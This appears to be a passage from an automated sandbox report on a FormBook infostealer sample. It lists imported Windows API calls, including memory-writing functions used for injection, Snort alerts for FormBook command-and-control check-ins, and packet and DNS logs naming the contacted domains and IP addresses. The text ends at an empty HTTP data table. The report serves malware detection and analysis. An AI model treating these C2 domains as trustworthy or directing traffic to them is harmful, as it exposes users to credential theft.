                                                                                                  gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPolyFillMode, GetPixelFormat, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                  user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIconFromResourceEx, CreateIcon, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                  kernel32.dllSleep
                                                                                                  oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                  ole32.dllCoUninitialize, CoInitialize
                                                                                                  oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                  comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                  shell32.dllExtractIconA
                                                                                                  nTDLLZwProtectVirtualMemory
                                                                                                  ntdllZwWriteVirtualMemory

                                                                                                  Network Behavior

                                                                                                  Snort IDS Alerts

                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  192.168.2.63.33.130.19049750802031412 11/30/23-14:58:44.521868TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.63.33.130.190
                                                                                                  192.168.2.6104.247.81.5049751802031412 11/30/23-14:59:05.034219TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.6104.247.81.50
                                                                                                  192.168.2.6104.140.89.2449749802031412 11/30/23-14:58:24.506470TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.6104.140.89.24
                                                                                                  192.168.2.662.72.50.8849753802031412 11/30/23-14:59:45.996751TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.662.72.50.88
                                                                                                  192.168.2.634.93.103.3949748802031412 11/30/23-14:58:03.063025TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.634.93.103.39
                                                                                                  192.168.2.637.97.254.2749752802031412 11/30/23-14:59:25.599111TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.637.97.254.27
                                                                                                  192.168.2.63.33.130.19049747802031412 11/30/23-14:57:23.481544TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.63.33.130.190

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Nov 30, 2023 14:57:23.382141113 CET4974780192.168.2.63.33.130.190
                                                                                                  Nov 30, 2023 14:57:23.481360912 CET80497473.33.130.190192.168.2.6
                                                                                                  Nov 30, 2023 14:57:23.481458902 CET4974780192.168.2.63.33.130.190
                                                                                                  Nov 30, 2023 14:57:23.481544018 CET4974780192.168.2.63.33.130.190
                                                                                                  Nov 30, 2023 14:57:23.580455065 CET80497473.33.130.190192.168.2.6
                                                                                                  Nov 30, 2023 14:57:23.581691980 CET80497473.33.130.190192.168.2.6
                                                                                                  Nov 30, 2023 14:57:23.581727028 CET80497473.33.130.190192.168.2.6
                                                                                                  Nov 30, 2023 14:57:23.581816912 CET4974780192.168.2.63.33.130.190
                                                                                                  Nov 30, 2023 14:57:23.581841946 CET4974780192.168.2.63.33.130.190
                                                                                                  Nov 30, 2023 14:57:23.595259905 CET80497473.33.130.190192.168.2.6
                                                                                                  Nov 30, 2023 14:57:23.595333099 CET4974780192.168.2.63.33.130.190
                                                                                                  Nov 30, 2023 14:57:23.680820942 CET80497473.33.130.190192.168.2.6
                                                                                                  Nov 30, 2023 14:58:02.717262030 CET4974880192.168.2.634.93.103.39
                                                                                                  Nov 30, 2023 14:58:03.062721968 CET804974834.93.103.39192.168.2.6
                                                                                                  Nov 30, 2023 14:58:03.062918901 CET4974880192.168.2.634.93.103.39
                                                                                                  Nov 30, 2023 14:58:03.063024998 CET4974880192.168.2.634.93.103.39
                                                                                                  Nov 30, 2023 14:58:03.407520056 CET804974834.93.103.39192.168.2.6
                                                                                                  Nov 30, 2023 14:58:03.408822060 CET804974834.93.103.39192.168.2.6
                                                                                                  Nov 30, 2023 14:58:03.408835888 CET804974834.93.103.39192.168.2.6
                                                                                                  Nov 30, 2023 14:58:03.409063101 CET4974880192.168.2.634.93.103.39
                                                                                                  Nov 30, 2023 14:58:03.409121990 CET4974880192.168.2.634.93.103.39
                                                                                                  Nov 30, 2023 14:58:03.753861904 CET804974834.93.103.39192.168.2.6
                                                                                                  Nov 30, 2023 14:58:24.371397018 CET4974980192.168.2.6104.140.89.24
                                                                                                  Nov 30, 2023 14:58:24.506150961 CET8049749104.140.89.24192.168.2.6
                                                                                                  Nov 30, 2023 14:58:24.506325960 CET4974980192.168.2.6104.140.89.24
                                                                                                  Nov 30, 2023 14:58:24.506469965 CET4974980192.168.2.6104.140.89.24
                                                                                                  Nov 30, 2023 14:58:24.645257950 CET8049749104.140.89.24192.168.2.6
                                                                                                  Nov 30, 2023 14:58:25.002307892 CET4974980192.168.2.6104.140.89.24
                                                                                                  Nov 30, 2023 14:58:25.137725115 CET8049749104.140.89.24192.168.2.6
                                                                                                  Nov 30, 2023 14:58:25.137778044 CET4974980192.168.2.6104.140.89.24
                                                                                                  Nov 30, 2023 14:58:44.422621012 CET4975080192.168.2.63.33.130.190
                                                                                                  Nov 30, 2023 14:58:44.521595001 CET80497503.33.130.190192.168.2.6
                                                                                                  Nov 30, 2023 14:58:44.521709919 CET4975080192.168.2.63.33.130.190
                                                                                                  Nov 30, 2023 14:58:44.521867990 CET4975080192.168.2.63.33.130.190
                                                                                                  Nov 30, 2023 14:58:44.620805979 CET80497503.33.130.190192.168.2.6
                                                                                                  Nov 30, 2023 14:58:44.626300097 CET80497503.33.130.190192.168.2.6
                                                                                                  Nov 30, 2023 14:58:44.626323938 CET80497503.33.130.190192.168.2.6
                                                                                                  Nov 30, 2023 14:58:44.626566887 CET4975080192.168.2.63.33.130.190
                                                                                                  Nov 30, 2023 14:58:44.626609087 CET4975080192.168.2.63.33.130.190
                                                                                                  Nov 30, 2023 14:58:44.642180920 CET80497503.33.130.190192.168.2.6
                                                                                                  Nov 30, 2023 14:58:44.642380953 CET4975080192.168.2.63.33.130.190
                                                                                                  Nov 30, 2023 14:58:44.725509882 CET80497503.33.130.190192.168.2.6
                                                                                                  Nov 30, 2023 14:59:04.784322977 CET4975180192.168.2.6104.247.81.50
                                                                                                  Nov 30, 2023 14:59:04.909048080 CET8049751104.247.81.50192.168.2.6
                                                                                                  Nov 30, 2023 14:59:04.909234047 CET4975180192.168.2.6104.247.81.50
                                                                                                  Nov 30, 2023 14:59:05.034149885 CET8049751104.247.81.50192.168.2.6
                                                                                                  Nov 30, 2023 14:59:05.034219027 CET4975180192.168.2.6104.247.81.50
                                                                                                  Nov 30, 2023 14:59:05.162760973 CET8049751104.247.81.50192.168.2.6
                                                                                                  Nov 30, 2023 14:59:05.162866116 CET8049751104.247.81.50192.168.2.6
                                                                                                  Nov 30, 2023 14:59:05.162878036 CET8049751104.247.81.50192.168.2.6
                                                                                                  Nov 30, 2023 14:59:05.162961006 CET4975180192.168.2.6104.247.81.50
                                                                                                  Nov 30, 2023 14:59:05.163002968 CET4975180192.168.2.6104.247.81.50
                                                                                                  Nov 30, 2023 14:59:05.287817001 CET8049751104.247.81.50192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.416368961 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.596170902 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.596410990 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.599111080 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.780606985 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.780627012 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.780642986 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.780658007 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.780670881 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.780683041 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.780695915 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.780708075 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.780720949 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.780725956 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.780736923 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.780767918 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.780785084 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.960726023 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.960789919 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.960823059 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.960839033 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.960855007 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.960869074 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.960891008 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.960912943 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.960936069 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.960959911 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.960980892 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961019039 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961035967 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.961042881 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961066008 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961081982 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.961081982 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.961095095 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961117029 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961122036 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.961142063 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961163998 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961170912 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.961186886 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961216927 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961227894 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.961265087 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.096074104 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141356945 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141415119 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141450882 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141457081 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141477108 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141501904 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141524076 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141545057 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141585112 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141621113 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141633987 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141658068 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141674042 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141694069 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141699076 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141730070 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141738892 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141766071 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141793966 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141805887 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141817093 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141844034 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141855955 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141879082 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141895056 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141915083 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141923904 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141951084 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141963959 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141985893 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141994953 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.142021894 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.142034054 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.142056942 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.142064095 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.142110109 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.276046038 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.276124001 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:45.842135906 CET4975380192.168.2.662.72.50.88
                                                                                                  Nov 30, 2023 14:59:45.996342897 CET804975362.72.50.88192.168.2.6
                                                                                                  Nov 30, 2023 14:59:45.996486902 CET4975380192.168.2.662.72.50.88
                                                                                                  Nov 30, 2023 14:59:45.996751070 CET4975380192.168.2.662.72.50.88
                                                                                                  Nov 30, 2023 14:59:46.150501966 CET804975362.72.50.88192.168.2.6
                                                                                                  Nov 30, 2023 14:59:46.150660992 CET804975362.72.50.88192.168.2.6
                                                                                                  Nov 30, 2023 14:59:46.150671005 CET804975362.72.50.88192.168.2.6
                                                                                                  Nov 30, 2023 14:59:46.150805950 CET4975380192.168.2.662.72.50.88
                                                                                                  Nov 30, 2023 14:59:46.150978088 CET4975380192.168.2.662.72.50.88
                                                                                                  Nov 30, 2023 14:59:46.304747105 CET804975362.72.50.88192.168.2.6
                                                                                                  Nov 30, 2023 15:00:08.723479986 CET4975480192.168.2.6156.237.159.158
                                                                                                  Nov 30, 2023 15:00:09.039400101 CET8049754156.237.159.158192.168.2.6
                                                                                                  Nov 30, 2023 15:00:09.039534092 CET4975480192.168.2.6156.237.159.158
                                                                                                  Nov 30, 2023 15:00:09.039658070 CET4975480192.168.2.6156.237.159.158
                                                                                                  Nov 30, 2023 15:00:09.355674982 CET8049754156.237.159.158192.168.2.6
                                                                                                  Nov 30, 2023 15:00:09.355779886 CET4975480192.168.2.6156.237.159.158
                                                                                                  Nov 30, 2023 15:00:09.355825901 CET4975480192.168.2.6156.237.159.158
                                                                                                  Nov 30, 2023 15:00:09.672169924 CET8049754156.237.159.158192.168.2.6

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Nov 30, 2023 14:56:13.914278984 CET5394553192.168.2.61.1.1.1
                                                                                                  Nov 30, 2023 14:56:14.789621115 CET6419653192.168.2.61.1.1.1
                                                                                                  Nov 30, 2023 14:56:41.161073923 CET5622853192.168.2.61.1.1.1
                                                                                                  Nov 30, 2023 14:57:01.941209078 CET6289953192.168.2.61.1.1.1
                                                                                                  Nov 30, 2023 14:57:02.152853012 CET53628991.1.1.1192.168.2.6
                                                                                                  Nov 30, 2023 14:57:23.174552917 CET5037553192.168.2.61.1.1.1
                                                                                                  Nov 30, 2023 14:57:23.381191969 CET53503751.1.1.1192.168.2.6
                                                                                                  Nov 30, 2023 14:57:42.159241915 CET5243853192.168.2.61.1.1.1
                                                                                                  Nov 30, 2023 14:57:42.291683912 CET53524381.1.1.1192.168.2.6
                                                                                                  Nov 30, 2023 14:58:02.331818104 CET5449153192.168.2.61.1.1.1
                                                                                                  Nov 30, 2023 14:58:02.716052055 CET53544911.1.1.1192.168.2.6
                                                                                                  Nov 30, 2023 14:58:23.905452967 CET5237253192.168.2.61.1.1.1
                                                                                                  Nov 30, 2023 14:58:24.370285988 CET53523721.1.1.1192.168.2.6
                                                                                                  Nov 30, 2023 14:58:44.284368992 CET5764353192.168.2.61.1.1.1
                                                                                                  Nov 30, 2023 14:58:44.421730995 CET53576431.1.1.1192.168.2.6
                                                                                                  Nov 30, 2023 14:59:04.643887043 CET6371653192.168.2.61.1.1.1
                                                                                                  Nov 30, 2023 14:59:04.782854080 CET53637161.1.1.1192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.025506973 CET6529953192.168.2.61.1.1.1
                                                                                                  Nov 30, 2023 14:59:25.415021896 CET53652991.1.1.1192.168.2.6
                                                                                                  Nov 30, 2023 14:59:45.393870115 CET6432053192.168.2.61.1.1.1
                                                                                                  Nov 30, 2023 14:59:45.840954065 CET53643201.1.1.1192.168.2.6
                                                                                                  Nov 30, 2023 15:00:06.378057003 CET6114253192.168.2.61.1.1.1
                                                                                                  Nov 30, 2023 15:00:06.987632990 CET53611421.1.1.1192.168.2.6

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Nov 30, 2023 14:56:13.914278984 CET192.168.2.61.1.1.10xeb02Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:56:14.789621115 CET192.168.2.61.1.1.10x8975Standard query (0)naopta.bn.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:56:41.161073923 CET192.168.2.61.1.1.10x6f7cStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:57:01.941209078 CET192.168.2.61.1.1.10x83a4Standard query (0)www.sprockettrucking.comA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:57:23.174552917 CET192.168.2.61.1.1.10x82f4Standard query (0)www.leathfortexas.comA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:57:42.159241915 CET192.168.2.61.1.1.10x3e50Standard query (0)www.ouxodb001.cfdA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:58:02.331818104 CET192.168.2.61.1.1.10x1c48Standard query (0)www.optimusvisionlb.comA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:58:23.905452967 CET192.168.2.61.1.1.10xb2f5Standard query (0)www.maltsky.netA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:58:44.284368992 CET192.168.2.61.1.1.10xaac1Standard query (0)www.thnkotb.comA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:59:04.643887043 CET192.168.2.61.1.1.10xfe36Standard query (0)www.harmonicod.comA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:59:25.025506973 CET192.168.2.61.1.1.10xafb1Standard query (0)www.kermisbedrijfkramer.onlineA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:59:45.393870115 CET192.168.2.61.1.1.10xb84eStandard query (0)www.stellarskyline.comA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 15:00:06.378057003 CET192.168.2.61.1.1.10x300eStandard query (0)www.hivaom.topA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Nov 30, 2023 14:56:14.044619083 CET1.1.1.1192.168.2.60xeb02No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:56:14.044619083 CET1.1.1.1192.168.2.60xeb02No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:56:14.947844982 CET1.1.1.1192.168.2.60x8975No error (0)naopta.bn.files.1drv.combn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:56:14.947844982 CET1.1.1.1192.168.2.60x8975No error (0)bn-files.fe.1drv.comodc-bn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:56:41.291358948 CET1.1.1.1192.168.2.60x6f7cNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:56:41.291358948 CET1.1.1.1192.168.2.60x6f7cNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:57:02.152853012 CET1.1.1.1192.168.2.60x83a4Name error (3)www.sprockettrucking.comnonenoneA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:57:23.381191969 CET1.1.1.1192.168.2.60x82f4No error (0)www.leathfortexas.comleathfortexas.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:57:23.381191969 CET1.1.1.1192.168.2.60x82f4No error (0)leathfortexas.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:57:23.381191969 CET1.1.1.1192.168.2.60x82f4No error (0)leathfortexas.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:57:42.291683912 CET1.1.1.1192.168.2.60x3e50Name error (3)www.ouxodb001.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:58:02.716052055 CET1.1.1.1192.168.2.60x1c48No error (0)www.optimusvisionlb.comoptimus-vision.odoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:58:02.716052055 CET1.1.1.1192.168.2.60x1c48No error (0)optimus-vision.odoo.com34.93.103.39A (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:58:24.370285988 CET1.1.1.1192.168.2.60xb2f5No error (0)www.maltsky.net104.140.89.24A (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:58:44.421730995 CET1.1.1.1192.168.2.60xaac1No error (0)www.thnkotb.comthnkotb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:58:44.421730995 CET1.1.1.1192.168.2.60xaac1No error (0)thnkotb.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:58:44.421730995 CET1.1.1.1192.168.2.60xaac1No error (0)thnkotb.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:59:04.782854080 CET1.1.1.1192.168.2.60xfe36No error (0)www.harmonicod.com104.247.81.50A (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:59:25.415021896 CET1.1.1.1192.168.2.60xafb1No error (0)www.kermisbedrijfkramer.onlinekermisbedrijfkramer.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:59:25.415021896 CET1.1.1.1192.168.2.60xafb1No error (0)kermisbedrijfkramer.online37.97.254.27A (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:59:45.840954065 CET1.1.1.1192.168.2.60xb84eNo error (0)www.stellarskyline.comstellarskyline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Nov 30, 2023 14:59:45.840954065 CET1.1.1.1192.168.2.60xb84eNo error (0)stellarskyline.com62.72.50.88A (IP address)IN (0x0001)false
                                                                                                  Nov 30, 2023 15:00:06.987632990 CET1.1.1.1192.168.2.60x300eNo error (0)www.hivaom.top156.237.159.158A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • www.leathfortexas.com
                                                                                                  • www.optimusvisionlb.com
                                                                                                  • www.maltsky.net
                                                                                                  • www.thnkotb.com
                                                                                                  • www.harmonicod.com
                                                                                                  • www.kermisbedrijfkramer.online
                                                                                                  • www.stellarskyline.com
                                                                                                  • www.hivaom.top

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.6497473.33.130.190804004C:\Windows\explorer.exe
                                                                                                  TimestampBytes transferredDirectionData
